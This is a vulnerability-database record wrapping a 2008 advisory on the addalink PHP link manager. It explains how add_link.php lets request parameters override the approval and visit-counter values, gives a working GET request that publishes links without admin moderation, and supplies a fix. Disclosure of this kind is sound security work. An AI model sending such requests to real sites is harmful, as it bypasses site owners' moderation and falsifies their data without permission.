Exploit for unknown platform in category web applications
{"id": "1337DAY-ID-3685", "type": "zdt", "bulletinFamily": "exploit", "title": "addalink <= 4 Write Approved Links Remote Vulnerability", "description": "Exploit for unknown platform in category web applications", "published": "2008-09-17T00:00:00", "modified": "2008-09-17T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://0day.today/exploit/description/3685", "reporter": "Pepelux", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2018-01-03T13:16:48", "viewCount": 11, "enchantments": {"score": {"value": -0.1, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": -0.1}, "sourceHref": "https://0day.today/exploit/3685", "sourceData": "=======================================================\r\naddalink <= 4 Write Approved Links Remote Vulnerability\r\n=======================================================\r\n\r\n\r\n-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\r\naddalink <= 4 - beta / Write approved links without a previous moderation by the admin\r\n-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\r\n\r\n$ Program: addalink\r\n$ Version: <= 4 - beta\r\n$ File affected: add_link.php\r\n$ Download: http://sourceforge.net/projects/addalink/\r\n\r\n\r\nLinklist is a miniwebsite that you can use in your webpage. Basically it \r\nmanages a database of links using PHP+MySQL. Users can send links (url, \r\ndescription, etc) by a form and one admin has to approve or delete the \r\nlinks before the publication in the website.\r\n\r\nOne not very important problem is that add_link.php doesn't test the \r\nmethod used (GET or POST). But the real problem is the method to insert \r\nsome values. \r\n\r\nReading the code you can see the SQL sentence:\r\n\r\nINSERT INTO $linktable VALUES('0','$url','$linkname','$approved=0','$email',\r\n '$counter=0','$description','$ip','$date','$category_id','0')\";\r\n\r\nIt asign values to approved and counter directly in the SQL sentence. For that,\r\nyou can enter links approved without moderation writing this:\r\n\r\nhttp://domain/add_link.php?url=http://www.domain.com&linkname=name_of_the_link\r\n&approved=1&[email\u00a0protected]&description=blablablablablablabla&category_id=1\r\n\r\nAlso you can alter the counter of visits if you add &counter=XXXX to the GET\r\n\r\n\r\n-= Solution =-\r\n\r\n\r\n$approved = 0;\r\n$counter = 0;\r\n\r\nINSERT INTO $linktable VALUES('0','$url','$linkname','$approved','$email',\r\n '$counter','$description','$ip','$date','$category_id','0')\";\r\n\r\n\r\n\r\n\n# 0day.today [2018-01-03] #", "_state": {"dependencies": 1645417471, "score": 1659766679}}